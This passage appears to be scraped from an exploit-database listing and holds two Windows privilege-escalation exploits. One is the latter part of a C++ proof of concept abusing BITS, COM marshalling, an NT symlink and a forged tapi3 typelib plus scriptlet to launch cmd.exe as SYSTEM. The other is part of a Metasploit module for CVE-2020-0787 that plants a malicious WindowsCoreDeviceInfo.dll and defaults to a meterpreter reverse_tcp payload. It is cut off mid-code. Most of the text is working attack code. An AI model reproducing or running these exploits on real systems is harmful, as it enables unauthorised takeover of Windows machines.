__uuidof(IBackgroundCopyCallback))\r\n {\r\n printf(\"Setting bad IID\\n\");\r\n iid = IID_ITMediaControl;\r\n }\r\n HRESULT hr = CoMarshalInterface(pStm, iid, _unk, dwDestContext, pvDestContext, mshlflags);\r\n printf(\"Marshal Complete: %08X\\n\", hr);\r\n return hr;\r\n }\r\n \r\n virtual HRESULT STDMETHODCALLTYPE UnmarshalInterface(\r\n /* [annotation][unique][in] */\r\n _In_ IStream *pStm,\r\n /* [annotation][in] */\r\n _In_ REFIID riid,\r\n /* [annotation][out] */\r\n _Outptr_ void **ppv)\r\n {\r\n return E_NOTIMPL;\r\n }\r\n \r\n virtual HRESULT STDMETHODCALLTYPE ReleaseMarshalData(\r\n /* [annotation][unique][in] */\r\n _In_ IStream *pStm)\r\n {\r\n return S_OK;\r\n }\r\n \r\n virtual HRESULT STDMETHODCALLTYPE DisconnectObject(\r\n /* [annotation][in] */\r\n _In_ DWORD dwReserved)\r\n {\r\n return S_OK;\r\n }\r\n};\r\n \r\nclass FakeObject : public IBackgroundCopyCallback2, public IPersist\r\n{\r\n LONG m_lRefCount;\r\n \r\n ~FakeObject() {};\r\n \r\npublic:\r\n //Constructor, Destructor\r\n FakeObject() {\r\n m_lRefCount = 1;\r\n }\r\n \r\n //IUnknown\r\n HRESULT __stdcall QueryInterface(REFIID riid, LPVOID *ppvObj)\r\n {\r\n if (riid == __uuidof(IUnknown))\r\n {\r\n printf(\"Query for IUnknown\\n\");\r\n *ppvObj = this;\r\n }\r\n else if (riid == __uuidof(IBackgroundCopyCallback2))\r\n {\r\n printf(\"Query for IBackgroundCopyCallback2\\n\");\r\n *ppvObj = static_cast<IBackgroundCopyCallback2*>(this);\r\n }\r\n else if (riid == __uuidof(IBackgroundCopyCallback))\r\n {\r\n printf(\"Query for IBackgroundCopyCallback\\n\");\r\n *ppvObj = static_cast<IBackgroundCopyCallback*>(this);\r\n }\r\n else if (riid == __uuidof(IPersist))\r\n {\r\n printf(\"Query for IPersist\\n\");\r\n *ppvObj = static_cast<IPersist*>(this);\r\n }\r\n else if (riid == IID_ITMediaControl)\r\n {\r\n printf(\"Query for ITMediaControl\\n\");\r\n *ppvObj = static_cast<IPersist*>(this);\r\n }\r\n else\r\n {\r\n printf(\"Unknown IID: %ls %p\\n\", IIDToBSTR(riid).GetBSTR(), this);\r\n *ppvObj 
= NULL;\r\n return E_NOINTERFACE;\r\n }\r\n \r\n ((IUnknown*)*ppvObj)->AddRef();\r\n return NOERROR;\r\n }\r\n \r\n ULONG __stdcall AddRef()\r\n {\r\n return InterlockedIncrement(&m_lRefCount);\r\n }\r\n \r\n ULONG __stdcall Release()\r\n {\r\n ULONG ulCount = InterlockedDecrement(&m_lRefCount);\r\n \r\n if (0 == ulCount)\r\n {\r\n delete this;\r\n }\r\n \r\n return ulCount;\r\n }\r\n \r\n virtual HRESULT STDMETHODCALLTYPE JobTransferred(\r\n /* [in] */ __RPC__in_opt IBackgroundCopyJob *pJob)\r\n {\r\n printf(\"JobTransferred\\n\");\r\n return S_OK;\r\n }\r\n \r\n virtual HRESULT STDMETHODCALLTYPE JobError(\r\n /* [in] */ __RPC__in_opt IBackgroundCopyJob *pJob,\r\n /* [in] */ __RPC__in_opt IBackgroundCopyError *pError)\r\n {\r\n printf(\"JobError\\n\");\r\n return S_OK;\r\n }\r\n \r\n \r\n virtual HRESULT STDMETHODCALLTYPE JobModification(\r\n /* [in] */ __RPC__in_opt IBackgroundCopyJob *pJob,\r\n /* [in] */ DWORD dwReserved)\r\n {\r\n printf(\"JobModification\\n\");\r\n return S_OK;\r\n }\r\n \r\n \r\n virtual HRESULT STDMETHODCALLTYPE FileTransferred(\r\n /* [in] */ __RPC__in_opt IBackgroundCopyJob *pJob,\r\n /* [in] */ __RPC__in_opt IBackgroundCopyFile *pFile)\r\n {\r\n printf(\"FileTransferred\\n\");\r\n return S_OK;\r\n }\r\n \r\n virtual HRESULT STDMETHODCALLTYPE GetClassID(\r\n /* [out] */ __RPC__out CLSID *pClassID)\r\n {\r\n *pClassID = GUID_NULL;\r\n return S_OK;\r\n }\r\n};\r\n \r\n_COM_SMARTPTR_TYPEDEF(IBackgroundCopyJob, __uuidof(IBackgroundCopyJob));\r\n_COM_SMARTPTR_TYPEDEF(IBackgroundCopyManager, __uuidof(IBackgroundCopyManager));\r\n \r\nstatic HRESULT Check(HRESULT hr)\r\n{\r\n if (FAILED(hr))\r\n {\r\n throw _com_error(hr);\r\n }\r\n return hr;\r\n}\r\n \r\n#define SYMBOLIC_LINK_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0x1)\r\n \r\ntypedef NTSTATUS(NTAPI* fNtCreateSymbolicLinkObject)(PHANDLE LinkHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PUNICODE_STRING TargetName);\r\ntypedef VOID(NTAPI 
*fRtlInitUnicodeString)(PUNICODE_STRING DestinationString, PCWSTR SourceString);\r\n \r\nFARPROC GetProcAddressNT(LPCSTR lpName)\r\n{\r\n return GetProcAddress(GetModuleHandleW(L\"ntdll\"), lpName);\r\n}\r\n \r\n \r\nclass ScopedHandle\r\n{\r\n HANDLE _h;\r\npublic:\r\n ScopedHandle() : _h(nullptr)\r\n {\r\n }\r\n \r\n ScopedHandle(ScopedHandle&) = delete;\r\n \r\n ScopedHandle(ScopedHandle&& h) {\r\n _h = h._h;\r\n h._h = nullptr;\r\n }\r\n \r\n ~ScopedHandle()\r\n {\r\n if (!invalid())\r\n {\r\n CloseHandle(_h);\r\n _h = nullptr;\r\n }\r\n }\r\n \r\n bool invalid() {\r\n return (_h == nullptr) || (_h == INVALID_HANDLE_VALUE);\r\n }\r\n \r\n void set(HANDLE h)\r\n {\r\n _h = h;\r\n }\r\n \r\n HANDLE get()\r\n {\r\n return _h;\r\n }\r\n \r\n HANDLE* ptr()\r\n {\r\n return &_h;\r\n }\r\n \r\n \r\n};\r\n \r\nScopedHandle CreateSymlink(LPCWSTR linkname, LPCWSTR targetname)\r\n{\r\n fRtlInitUnicodeString pfRtlInitUnicodeString = (fRtlInitUnicodeString)GetProcAddressNT(\"RtlInitUnicodeString\");\r\n fNtCreateSymbolicLinkObject pfNtCreateSymbolicLinkObject = (fNtCreateSymbolicLinkObject)GetProcAddressNT(\"NtCreateSymbolicLinkObject\");\r\n \r\n OBJECT_ATTRIBUTES objAttr;\r\n UNICODE_STRING name;\r\n UNICODE_STRING target;\r\n \r\n pfRtlInitUnicodeString(&name, linkname);\r\n pfRtlInitUnicodeString(&target, targetname);\r\n \r\n InitializeObjectAttributes(&objAttr, &name, OBJ_CASE_INSENSITIVE, nullptr, nullptr);\r\n \r\n ScopedHandle hLink;\r\n \r\n NTSTATUS status = pfNtCreateSymbolicLinkObject(hLink.ptr(), SYMBOLIC_LINK_ALL_ACCESS, &objAttr, &target);\r\n if (status == 0)\r\n {\r\n printf(\"Opened Link %ls -> %ls: %p\\n\", linkname, targetname, hLink.get());\r\n return hLink;\r\n }\r\n else\r\n {\r\n printf(\"Error creating link %ls: %08X\\n\", linkname, status);\r\n return ScopedHandle();\r\n }\r\n}\r\n \r\n \r\nbstr_t GetSystemDrive()\r\n{\r\n WCHAR windows_dir[MAX_PATH] = { 0 };\r\n \r\n GetWindowsDirectory(windows_dir, MAX_PATH);\r\n \r\n windows_dir[2] = 0;\r\n 
\r\n return windows_dir;\r\n}\r\n \r\nbstr_t GetDeviceFromPath(LPCWSTR lpPath)\r\n{\r\n WCHAR drive[3] = { 0 };\r\n drive[0] = lpPath[0];\r\n drive[1] = lpPath[1];\r\n drive[2] = 0;\r\n \r\n WCHAR device_name[MAX_PATH] = { 0 };\r\n \r\n if (QueryDosDevice(drive, device_name, MAX_PATH))\r\n {\r\n return device_name;\r\n }\r\n else\r\n {\r\n printf(\"Error getting device for %ls\\n\", lpPath);\r\n exit(1);\r\n }\r\n}\r\n \r\nbstr_t GetSystemDevice()\r\n{\r\n return GetDeviceFromPath(GetSystemDrive());\r\n}\r\n \r\nbstr_t GetExe()\r\n{\r\n WCHAR curr_path[MAX_PATH] = { 0 };\r\n GetModuleFileName(nullptr, curr_path, MAX_PATH);\r\n return curr_path;\r\n}\r\n \r\nbstr_t GetExeDir()\r\n{\r\n WCHAR curr_path[MAX_PATH] = { 0 };\r\n GetModuleFileName(nullptr, curr_path, MAX_PATH);\r\n PathRemoveFileSpec(curr_path);\r\n \r\n return curr_path;\r\n}\r\n \r\nbstr_t GetCurrentPath()\r\n{\r\n bstr_t curr_path = GetExeDir();\r\n \r\n bstr_t ret = GetDeviceFromPath(curr_path);\r\n \r\n ret += &curr_path.GetBSTR()[2];\r\n \r\n return ret;\r\n}\r\n \r\nvoid TestBits()\r\n{\r\n IBackgroundCopyManagerPtr pQueueMgr;\r\n \r\n Check(CoCreateInstance(__uuidof(BackgroundCopyManager), NULL,\r\n CLSCTX_LOCAL_SERVER, IID_PPV_ARGS(&pQueueMgr)));\r\n \r\n IUnknownPtr pOuter = new CMarshaller(static_cast<IPersist*>(new FakeObject()));\r\n IUnknownPtr pInner;\r\n \r\n Check(CoGetStdMarshalEx(pOuter, SMEXF_SERVER, &pInner));\r\n \r\n IBackgroundCopyJobPtr pJob;\r\n GUID guidJob;\r\n Check(pQueueMgr->CreateJob(L\"BitsAuthSample\",\r\n BG_JOB_TYPE_DOWNLOAD,\r\n &guidJob,\r\n &pJob));\r\n \r\n IUnknownPtr pNotify;\r\n pNotify.Attach(new CMarshaller(pInner));\r\n {\r\n ScopedHandle link = CreateSymlink(L\"\\\\??\\\\C:\", GetCurrentPath());\r\n printf(\"Result: %08X\\n\", pJob->SetNotifyInterface(pNotify));\r\n }\r\n if (pJob)\r\n {\r\n pJob->Cancel();\r\n }\r\n printf(\"Done\\n\");\r\n}\r\n \r\nclass CoInit\r\n{\r\npublic:\r\n CoInit()\r\n {\r\n Check(CoInitialize(nullptr));\r\n 
Check(CoInitializeSecurity(nullptr, -1, nullptr, nullptr,\r\n RPC_C_AUTHN_LEVEL_DEFAULT, RPC_C_IMP_LEVEL_IMPERSONATE, nullptr, EOAC_NO_CUSTOM_MARSHAL | EOAC_DYNAMIC_CLOAKING, nullptr));\r\n }\r\n \r\n ~CoInit()\r\n {\r\n CoUninitialize();\r\n }\r\n};\r\n \r\n// {D487789C-32A3-4E22-B46A-C4C4C1C2D3E0}\r\nstatic const GUID IID_BaseInterface =\r\n{ 0xd487789c, 0x32a3, 0x4e22,{ 0xb4, 0x6a, 0xc4, 0xc4, 0xc1, 0xc2, 0xd3, 0xe0 } };\r\n \r\n// {6C6C9F33-AE88-4EC2-BE2D-449A0FFF8C02}\r\nstatic const GUID TypeLib_BaseInterface =\r\n{ 0x6c6c9f33, 0xae88, 0x4ec2,{ 0xbe, 0x2d, 0x44, 0x9a, 0xf, 0xff, 0x8c, 0x2 } };\r\n \r\nGUID TypeLib_Tapi3 = { 0x21d6d480,0xa88b,0x11d0,{ 0x83,0xdd,0x00,0xaa,0x00,0x3c,0xca,0xbd } };\r\n \r\nvoid Create(bstr_t filename, bstr_t if_name, REFGUID typelib_guid, REFGUID iid, ITypeLib* ref_typelib, REFGUID ref_iid)\r\n{\r\n DeleteFile(filename);\r\n ICreateTypeLib2Ptr tlb;\r\n Check(CreateTypeLib2(SYS_WIN32, filename, &tlb));\r\n tlb->SetGuid(typelib_guid);\r\n \r\n ITypeInfoPtr ref_type_info;\r\n Check(ref_typelib->GetTypeInfoOfGuid(ref_iid, &ref_type_info));\r\n \r\n ICreateTypeInfoPtr create_info;\r\n Check(tlb->CreateTypeInfo(if_name, TKIND_INTERFACE, &create_info));\r\n Check(create_info->SetTypeFlags(TYPEFLAG_FDUAL | TYPEFLAG_FOLEAUTOMATION));\r\n HREFTYPE ref_type;\r\n Check(create_info->AddRefTypeInfo(ref_type_info, &ref_type));\r\n Check(create_info->AddImplType(0, ref_type));\r\n Check(create_info->SetGuid(iid));\r\n Check(tlb->SaveAllChanges());\r\n}\r\n \r\nstd::vector<BYTE> ReadFile(bstr_t path)\r\n{\r\n ScopedHandle hFile;\r\n hFile.set(CreateFile(path, GENERIC_READ, 0, nullptr, OPEN_EXISTING, 0, nullptr));\r\n if (hFile.invalid())\r\n {\r\n throw _com_error(E_FAIL);\r\n } \r\n DWORD size = GetFileSize(hFile.get(), nullptr);\r\n std::vector<BYTE> ret(size);\r\n if (size > 0)\r\n {\r\n DWORD bytes_read;\r\n if (!ReadFile(hFile.get(), ret.data(), size, &bytes_read, nullptr) || bytes_read != size)\r\n {\r\n throw _com_error(E_FAIL);\r\n }\r\n 
}\r\n \r\n return ret;\r\n}\r\n \r\nvoid WriteFile(bstr_t path, const std::vector<BYTE> data)\r\n{\r\n ScopedHandle hFile;\r\n hFile.set(CreateFile(path, GENERIC_WRITE, 0, nullptr, CREATE_ALWAYS, 0, nullptr));\r\n if (hFile.invalid())\r\n {\r\n throw _com_error(E_FAIL);\r\n }\r\n \r\n if (data.size() > 0)\r\n {\r\n DWORD bytes_written;\r\n if (!WriteFile(hFile.get(), data.data(), data.size(), &bytes_written, nullptr) || bytes_written != data.size())\r\n {\r\n throw _com_error(E_FAIL);\r\n }\r\n }\r\n}\r\n \r\nvoid WriteFile(bstr_t path, const char* data)\r\n{\r\n const BYTE* bytes = reinterpret_cast<const BYTE*>(data);\r\n std::vector<BYTE> data_buf(bytes, bytes + strlen(data));\r\n WriteFile(path, data_buf);\r\n}\r\n \r\nvoid BuildTypeLibs(LPCSTR script_path)\r\n{\r\n ITypeLibPtr stdole2;\r\n Check(LoadTypeLib(L\"stdole2.tlb\", &stdole2));\r\n \r\n printf(\"Building Library with path: %s\\n\", script_path);\r\n unsigned int len = strlen(script_path);\r\n \r\n bstr_t buf = GetExeDir() + L\"\\\\\";\r\n for (unsigned int i = 0; i < len; ++i)\r\n {\r\n buf += L\"A\";\r\n }\r\n \r\n Create(buf, \"IBadger\", TypeLib_BaseInterface, IID_BaseInterface, stdole2, IID_IDispatch);\r\n ITypeLibPtr abc;\r\n Check(LoadTypeLib(buf, &abc));\r\n \r\n \r\n bstr_t built_tlb = GetExeDir() + L\"\\\\output.tlb\";\r\n Create(built_tlb, \"ITMediaControl\", TypeLib_Tapi3, IID_ITMediaControl, abc, IID_BaseInterface);\r\n \r\n std::vector<BYTE> tlb_data = ReadFile(built_tlb);\r\n for (size_t i = 0; i < tlb_data.size() - len; ++i)\r\n {\r\n bool found = true;\r\n for (unsigned int j = 0; j < len; j++)\r\n {\r\n if (tlb_data[i + j] != 'A')\r\n {\r\n found = false;\r\n }\r\n }\r\n \r\n if (found)\r\n {\r\n printf(\"Found TLB name at offset %zu\\n\", i);\r\n memcpy(&tlb_data[i], script_path, len);\r\n break;\r\n }\r\n }\r\n \r\n CreateDirectory(GetExeDir() + L\"\\\\Windows\", nullptr);\r\n CreateDirectory(GetExeDir() + L\"\\\\Windows\\\\System32\", nullptr);\r\n \r\n bstr_t target_tlb = 
GetExeDir() + L\"\\\\Windows\\\\system32\\\\tapi3.dll\";\r\n WriteFile(target_tlb, tlb_data);\r\n}\r\n \r\nconst wchar_t x[] = L\"ABC\";\r\n \r\nconst wchar_t scriptlet_start[] = L\"<?xml version='1.0'?>\\r\\n<package>\\r\\n<component id='giffile'>\\r\\n\"\r\n\"<registration description='Dummy' progid='giffile' version='1.00' remotable='True'>\\r\\n\"\\\r\n\"</registration>\\r\\n\"\\\r\n\"<script language='JScript'>\\r\\n\"\\\r\n\"<![CDATA[\\r\\n\"\\\r\n\" new ActiveXObject('Wscript.Shell').exec('\";\r\n \r\nconst wchar_t scriptlet_end[] = L\"');\\r\\n\"\\\r\n\"]]>\\r\\n\"\\\r\n\"</script>\\r\\n\"\\\r\n\"</component>\\r\\n\"\\\r\n\"</package>\\r\\n\";\r\n \r\nbstr_t CreateScriptletFile()\r\n{\r\n bstr_t script_file = GetExeDir() + L\"\\\\run.sct\";\r\n bstr_t script_data = scriptlet_start;\r\n bstr_t exe_file = GetExe();\r\n wchar_t* p = exe_file;\r\n while (*p)\r\n {\r\n if (*p == '\\\\')\r\n {\r\n *p = '/';\r\n }\r\n p++;\r\n }\r\n \r\n DWORD session_id;\r\n ProcessIdToSessionId(GetCurrentProcessId(), &session_id);\r\n WCHAR session_str[16];\r\n StringCchPrintf(session_str, _countof(session_str), L\"%d\", session_id);\r\n \r\n script_data += L\"\\\"\" + exe_file + L\"\\\" \" + session_str + scriptlet_end;\r\n \r\n WriteFile(script_file, script_data);\r\n \r\n return script_file;\r\n}\r\n \r\nvoid CreateNewProcess(const wchar_t* session)\r\n{\r\n DWORD session_id = wcstoul(session, nullptr, 0);\r\n ScopedHandle token;\r\n if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, token.ptr()))\r\n {\r\n throw _com_error(E_FAIL);\r\n }\r\n \r\n ScopedHandle new_token;\r\n \r\n if (!DuplicateTokenEx(token.get(), TOKEN_ALL_ACCESS, nullptr, SecurityAnonymous, TokenPrimary, new_token.ptr()))\r\n {\r\n throw _com_error(E_FAIL);\r\n }\r\n \r\n SetTokenInformation(new_token.get(), TokenSessionId, &session_id, sizeof(session_id));\r\n \r\n STARTUPINFO start_info = {};\r\n start_info.cb = sizeof(start_info);\r\n start_info.lpDesktop = L\"WinSta0\\\\Default\";\r\n 
PROCESS_INFORMATION proc_info;\r\n WCHAR cmdline[] = L\"cmd.exe\";\r\n if (CreateProcessAsUser(new_token.get(), nullptr, cmdline,\r\n nullptr, nullptr, FALSE, CREATE_NEW_CONSOLE, nullptr, nullptr, &start_info, &proc_info))\r\n {\r\n CloseHandle(proc_info.hProcess);\r\n CloseHandle(proc_info.hThread);\r\n }\r\n}\r\n \r\nint wmain(int argc, wchar_t** argv)\r\n{\r\n try\r\n {\r\n CoInit ci;\r\n if (argc > 1)\r\n {\r\n CreateNewProcess(argv[1]);\r\n }\r\n else\r\n {\r\n bstr_t script = L\"script:\" + CreateScriptletFile();\r\n BuildTypeLibs(script);\r\n TestBits();\r\n }\r\n }\r\n catch (const _com_error& err)\r\n {\r\n printf(\"Error: %ls\\n\", err.ErrorMessage());\r\n }\r\n \r\n return 0;\r\n}\n\n# 0day.today [2018-02-21] #", "sourceHref": "https://0day.today/exploit/27798", "cvss": {"score": 1.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2021-12-07T13:40:00", "description": "This Metasploit module exploits CVE-2020-0787, an arbitrary file move vulnerability in outdated versions of the Background Intelligent Transfer Service (BITS), to overwrite C:\\Windows\\System32\\WindowsCoreDeviceInfo.dll with a malicious DLL containing the attacker's payload. To achieve code execution as the SYSTEM user, the Update Session Orchestrator service is then started, which will result in the malicious WindowsCoreDeviceInfo.dll being run with SYSTEM privileges due to a DLL hijacking issue within the Update Session Orchestrator Service. Note that presently this module only works on Windows 10 and Windows Server 2016 and later as the Update Session Orchestrator Service was only introduced in Windows 10. 
Note that only Windows 10 has been tested, so your mileage may vary on Windows Server 2016 and later.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-06-12T00:00:00", "type": "zdt", "title": "Background Intelligent Transfer Service Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0787", "CVE-2020-0688"], "modified": "2020-06-12T00:00:00", "id": "1337DAY-ID-34553", "href": "https://0day.today/exploit/description/34553", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::Windows::Priv\n include Msf::Exploit::EXE # Needed for generate_payload_dll\n include Msf::Post::Windows::FileSystem\n include Msf::Post::Windows::ReflectiveDLLInjection\n include Msf::Exploit::FileDropper\n include Msf::Post::File\n include Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Background Intelligent Transfer Service 
Arbitrary File Move Privilege Elevation Vulnerability',\n 'Description' => %q{\n This module exploits CVE-2020-0787, an arbitrary file move vulnerability in outdated versions of the\n Background Intelligent Transfer Service (BITS), to overwrite C:\\Windows\\System32\\WindowsCoreDeviceInfo.dll\n with a malicious DLL containing the attacker's payload.\n\n To achieve code execution as the SYSTEM user, the Update Session Orchestrator service is then started, which\n will result in the malicious WindowsCoreDeviceInfo.dll being run with SYSTEM privileges due to a DLL hijacking\n issue within the Update Session Orchestrator Service.\n\n Note that presently this module only works on Windows 10 and Windows Server 2016 and later as the\n Update Session Orchestrator Service was only introduced in Windows 10. Note that only Windows 10 has been tested,\n so your mileage may vary on Windows Server 2016 and later.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'itm4n', # PoC\n 'gwillcox-r7' # msf module\n ],\n 'Platform' => ['win'],\n 'SessionTypes' => ['meterpreter'],\n 'Privileged' => true,\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' =>\n [\n [ 'Windows DLL Dropper', { 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :windows_dropper } ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2020-03-10',\n 'References' =>\n [\n ['CVE', '2020-0787'],\n ['URL', 'https://itm4n.github.io/cve-2020-0787-windows-bits-eop/'],\n ['URL', 'https://github.com/itm4n/BitsArbitraryFileMove'],\n ['URL', 'https://attackerkb.com/assessments/e61cfec0-d766-4e7e-89f7-5aad2460afb8'],\n ['URL', 'https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html'],\n ['URL', 'https://itm4n.github.io/usodllloader-part1/'],\n ['URL', 'https://itm4n.github.io/usodllloader-part2/'],\n ],\n 'Notes' =>\n {\n 'SideEffects' => [ ARTIFACTS_ON_DISK ],\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n 
'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',\n 'WfsDelay' => 900\n }\n )\n )\n\n register_options([\n OptBool.new('OVERWRITE_DLL', [true, 'Overwrite WindowsCoreDeviceInfo.dll if it exists (false by default).', false]),\n OptInt.new('JOB_WAIT_TIME', [true, 'Time to wait for the BITS job to complete before starting the USO service to execute the uploaded payload, in seconds', 20])\n ])\n end\n\n def target_not_presently_supported\n print_warning('This target is not presently supported by this exploit. Support may be added in the future!')\n print_warning('Attempts to exploit this target with this module WILL NOT WORK!')\n end\n\n def check\n sysinfo_value = sysinfo['OS']\n\n if sysinfo_value !~ /windows/i\n # Non-Windows systems are definitely not affected.\n return CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!')\n end\n\n # XXX Using session.shell_command_token over cmd_exec() here as @wvu-r7 noticed cmd_exec() was broken under some situations.\n build_num_raw = session.shell_command_token('cmd.exe /c ver')\n build_num = build_num_raw.match(/\\d+\\.\\d+\\.\\d+\\.\\d+/)\n if build_num.nil?\n print_error(\"Couldn't retrieve the target's build number!\")\n else\n build_num = build_num_raw.match(/\\d+\\.\\d+\\.\\d+\\.\\d+/)[0]\n print_status(\"Target's build number: #{build_num}\")\n end\n\n # see https://docs.microsoft.com/en-us/windows/release-information/\n unless sysinfo_value =~ /(7|8|8\\.1|10|2008|2012|2016|2019|1803|1903)/\n return CheckCode::Safe('Target is not running a vulnerable version of Windows!')\n end\n\n build_num_gemversion = Gem::Version.new(build_num)\n\n # Build numbers taken from https://www.qualys.com/research/security-alerts/2020-03-10/microsoft/\n if (build_num_gemversion >= Gem::Version.new('10.0.18363.0')) && (build_num_gemversion < Gem::Version.new('10.0.18363.719')) # Windows 10 v1909\n return CheckCode::Appears('Vulnerable Windows 10 v1909 build detected!')\n elsif (build_num_gemversion 
>= Gem::Version.new('10.0.18362.0')) && (build_num_gemversion < Gem::Version.new('10.0.18362.719')) # Windows 10 v1903\n return CheckCode::Appears('Vulnerable Windows 10 v1903 build detected!')\n elsif (build_num_gemversion >= Gem::Version.new('10.0.17763.0')) && (build_num_gemversion < Gem::Version.new('10.0.17763.1098')) # Windows 10 v1809\n return CheckCode::Appears('Vulnerable Windows 10 v1809 build detected!')\n elsif (build_num_gemversion >= Gem::Version.new('10.0.17134.0')) && (build_num_gemversion < Gem::Version.new('10.0.17134.1365')) # Windows 10 v1803\n return CheckCode::Appears('Vulnerable Windows 10 v1803 build detected!')\n elsif (build_num_gemversion >= Gem::Version.new('10.0.16299.0')) && (build_num_gemversion < Gem::Version.new('10.0.16299.1747')) # Windows 10 v1709\n return CheckCode::Appears('Vulnerable Windows 10 v1709 build detected!')\n elsif (build_num_gemversion >= Gem::Version.new('10.0.15063.0')) && (build_num_gemversion < Gem::Version.new('10.0.15063.2313')) # Windows 10 v1703\n return CheckCode::Appears('Vulnerable Windows 10 v1703 build detected!')\n elsif (build_num_gemversion >= Gem::Version.new('10.0.14393.0')) && (build_num_gemversion < Gem::Version.new('10.0.14393.3564')) # Windows 10 v1607\n return CheckCode::Appears('Vulnerable Windows 10 v1607 build detected!')\n elsif (build_num_gemversion >= Gem::Version.new('10.0.10586.0')) && (build_num_gemversion < Gem::Version.new('10.0.10586.9999999')) # Windows 10 v1511\n return CheckCode::Appears('Vulnerable Windows 10 v1511 build detected!')\n elsif (build_num_gemversion >= Gem::Version.new('10.0.10240.0')) && (build_num_gemversion < Gem::Version.new('10.0.10240.18519')) # Windows 10 v1507\n return CheckCode::Appears('Vulnerable Windows 10 v1507 build detected!')\n elsif (build_num_gemversion >= Gem::Version.new('6.3.9600.0')) && (build_num_gemversion < Gem::Version.new('6.3.9600.19665')) # Windows 8.1/Windows Server 2012 R2\n target_not_presently_supported\n return 
CheckCode::Appears('Vulnerable Windows 8.1/Windows Server 2012 R2 build detected!')\n elsif (build_num_gemversion >= Gem::Version.new('6.2.9200.0')) && (build_num_gemversion < Gem::Version.new('6.2.9200.23009')) # Windows 8/Windows Server 2012\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 8/Windows Server 2012 build detected!')\n elsif (build_num_gemversion >= Gem::Version.new('6.1.7600.0')) && (build_num_gemversion < Gem::Version.new('6.1.7601.24549')) # Windows 7/Windows Server 2008 R2\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 7/Windows Server 2008 R2 build detected!')\n elsif (build_num_gemversion >= Gem::Version.new('6.0.6001.0')) && (build_num_gemversion < Gem::Version.new('6.0.6003.20749')) # Windows Server 2008/Windows Server 2008 SP2\n target_not_presently_supported\n return CheckCode::Appears('Windows Server 2008/Windows Server 2008 SP2 build detected!')\n else\n return CheckCode::Safe('The build number of the target machine does not appear to be a vulnerable version!')\n end\n end\n\n def check_target_is_running_supported_windows_version\n if sysinfo['OS'].match('Windows').nil?\n fail_with(Failure::NotVulnerable, 'Target is not running Windows!')\n elsif sysinfo['OS'].match('Windows 10').nil? && sysinfo['OS'].match('Windows Server 2016').nil? && sysinfo['OS'].match('Windows Server 2019').nil?\n fail_with(Failure::BadConfig, 'Target is running Windows, its not a version this module supports! 
Bailing...')\n end\n end\n\n def check_target_and_payload_match_and_supported(client_arch)\n if (client_arch != ARCH_X64) && (client_arch != ARCH_X86)\n fail_with(Failure::BadConfig, 'This exploit currently only supports x86 and x64 targets!')\n end\n payload_arch = payload.arch.first # TODO: Add missing documentation for payload.arch, @wvu used this first but it is not documented anywhere.\n if (payload_arch != ARCH_X64) && (payload_arch != ARCH_X86)\n fail_with(Failure::BadConfig, \"Unsupported payload architecture (#{payload_arch})\") # Unsupported architecture, so return an error.\n end\n if ((client_arch == ARCH_X64) && (payload_arch != ARCH_X64)) || ((client_arch == ARCH_X86) && (payload_arch != ARCH_X86))\n fail_with(Failure::BadConfig, \"Payload architecture (#{payload_arch}) doesn't match the architecture of the target (#{client_arch})!\")\n end\n end\n\n def check_windowscoredeviceinfo_dll_exists_on_target\n # Taken from bwatters-r7's cve-2020-0688_service_tracing.rb code.\n #\n # We are going to overwrite the WindowsCoreDeviceInfo.dll DLL as part of our exploit.\n # The second part of this exploit will trigger a Update Session to be created so that this DLL\n # is loaded, which will result in arbitrary code execution as SYSTEM.\n #\n # To prevent any errors, we will first check that this file doesn't exist and ask the user if they are sure\n # that they want to overwrite the file.\n win_dir = session.sys.config.getenv('windir')\n normal_target_payload_pathname = \"#{win_dir}\\\\System32\\\\WindowsCoreDeviceInfo.dll\"\n wow64_target_payload_pathname = \"#{win_dir}\\\\Sysnative\\\\WindowsCoreDeviceInfo.dll\"\n wow64_existing_file = \"#{win_dir}\\\\Sysnative\\\\win32k.sys\"\n if file?(wow64_existing_file)\n if file?(wow64_target_payload_pathname)\n print_warning(\"#{wow64_target_payload_pathname} already exists\")\n print_warning('If it is in use, the overwrite will fail')\n unless datastore['OVERWRITE_DLL']\n 